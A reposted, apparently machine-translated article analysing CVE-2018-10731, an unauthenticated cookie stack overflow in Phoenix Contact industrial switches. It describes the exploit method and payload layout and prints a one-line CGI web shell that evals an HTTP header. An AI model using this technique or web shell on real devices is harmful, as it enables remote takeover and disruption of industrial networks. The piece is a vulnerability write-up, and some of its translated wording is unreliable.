Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an analysis of industrial switch loopholes CVE-2018-10731. The article is rich in content and analyzes and describes it from a professional point of view. I hope you can get something after reading this article.

The editor analyzes the CVE-2018-10731 vulnerability of FL SWITCH 3xxx, FL SWITCH 4xxx and FL SWITCH 48xx series devices in Phoenix Contact switches. The vulnerability lies in the Web interface of the device and can execute arbitrary code without knowing the device credentials.

Loophole analysis

The Linux mentioned above can be configured using the web interface. Like many other household and industrial IoT devices, the web interface consists of many CGI applications that process users' HTTP requests. In the case of this article, the CGI application uses the cgic library, which makes it easier to process HTTP requests, and the library's functionality is built into the libipinfusionweb.so shared library in the device file system.

When processing a HTTP request, the web server passes the user request data to the CGI application as a set of environment variables. Their initial processing is performed by the main function in the libipinfusionweb library. Next, the main function calls the cgiMain function of the CGI application, where the request is further processed.

Figure 1. Processing HTTP requests

During its work, the main function of the libipinfusionweb library calls the get_login_user function, which determines whether the user has been authenticated by the system using the passed cookie value.

Figure 2. Code snippet of main function

The function get_login_user uses the cookies_get_value function to get the cookie value of the c_session parameter and store it in the local_e0 variable. The variable local_e0 is a single-byte character array of length 0x80 and is located at a distance from the 0xE0 at the beginning of the stack.

Figure 3. Code snippet of get_login_user function

However, as you can see from the code of the cookies_get_value function, the maximum length of the cookie parameter value obtained using the cgiCookieString function is 0x400 bytes.

Figure 4. Code snippet of cookies_get_value function

Therefore, when a cookie parameter longer than 0xE0 (224) characters is passed, the get_login_user function saves the value of this parameter to its stack, and as a result, all information on the stack following the local_e0 variable is overwritten, including the function return address.

Note: when one function calls another, the return address is stored in the stack. When the called function completes, control is transferred to the return address. Therefore, if you rewrite this address, you can control the program execution process. For example, an attacker can replace this address with the address of a malicious shellcode located in the program address space.

Note that the overwriting of the return address occurs prior to authentication, which makes it possible for an attacker who does not know the device account to exploit this vulnerability.

Utilization

We considered several ways to demonstrate the possibility of exploiting this vulnerability. The easiest way is to write the payload code on the stack (0x400-0xE0 = 800bytes left, which is enough for the code), and then overwrite the return address with the code address. This is feasible in theory because the switch processor with this vulnerability does not support the NX bit function (that is, it allows code located anywhere, including the stack), but in practice there are serious restrictions.

These switch processors have an MIPS architecture in which many processor instructions are encoded in a sequence of bytes containing zero bytes. Writing to the buffer ends when the first null byte is encountered (due to the use of the strcpy function), so only opcodes that do not contain null bytes can be used, but this is not possible because any payload uses at least a few empty bytes.

Similarly, when building a ROP chain, you will have to face the limitation of null bytes: the address of the ROP gadgets should not contain zeros, which greatly complicates the address search. In general, we can only use a zero copied by the strcpy function, which limits the creation of a complete ROP chain. In addition, we need very little gadgets. However, the following code snippet was found when searching the libipinfusionweb library:

Figure 5. Executable code snippet of the libipinfusionweb library

Assuming that the contents of the register $s0 are controlled, this code snippet uses the mysystem function to enable you to execute the OS command (the function initially had no name, but we renamed it because it is very similar to the system function in Linux).

Since we are overriding the return address of the get_login_user function, the function will execute to the end. From the end of the get_login_user function, you can see that the value of register $s0 is restored from the previously saved value on the stack (offset 0xD8 from the top of the stack). At this point, however, the stack area is under our control, that is, we can actually control the contents of register $s0 so that we can execute arbitrary OS commands using the mysystem function.

Figure 6. Executable code snippet of get_login_user function

Therefore, in order to successfully demonstrate this exploit, the c_session cookie parameter string that needs to be sent should contain the following:

OS command string, which is then passed to the mysystem function

Address of the OS command on the stack

New return address (address of the code snippet shown in figure 5)

The final payload should be as follows:

Figure 7. Effective load

So far, we have exploited the vulnerability to obtain the shell on the device, which requires administrator privileges. As a result, we can get more additional information that is helpful to follow-up operations:

ASLR is disabled on this research device, so the addresses of the gadget and OS commands used will always be the same.

Figure 8. ASLR status on the device being studied

The range of memory addresses in which the stack may be located. In order to calculate the exact address, we traversed all the addresses in the range.

As a payload, we implemented the loading of the web shell-CGI application, which is as follows:

#! / bin/sheval $HTTP_CMD 2 > & 1

Because according to the CGI protocol, the contents of the HTTP header are transferred to the CGI application in the form of an environment variable named HTTP_, the shell will execute the contents of the HTTP header CMD using the eval command. The following figure shows the results of successfully running and executing the ls command using the loaded shell.

Figure 9. Results of successful execution and execution of the ls command

The ability to exploit this vulnerability is shown above, and as we have already mentioned, its operation does not need to know a password, so it can even be performed by an unauthenticated attacker.

Invading the industrial network switch may damage the entire network environment, and the interruption of network interaction will adversely affect the process until it stops completely.

The above is the analysis of industrial switch loophole CVE-2018-10731 shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.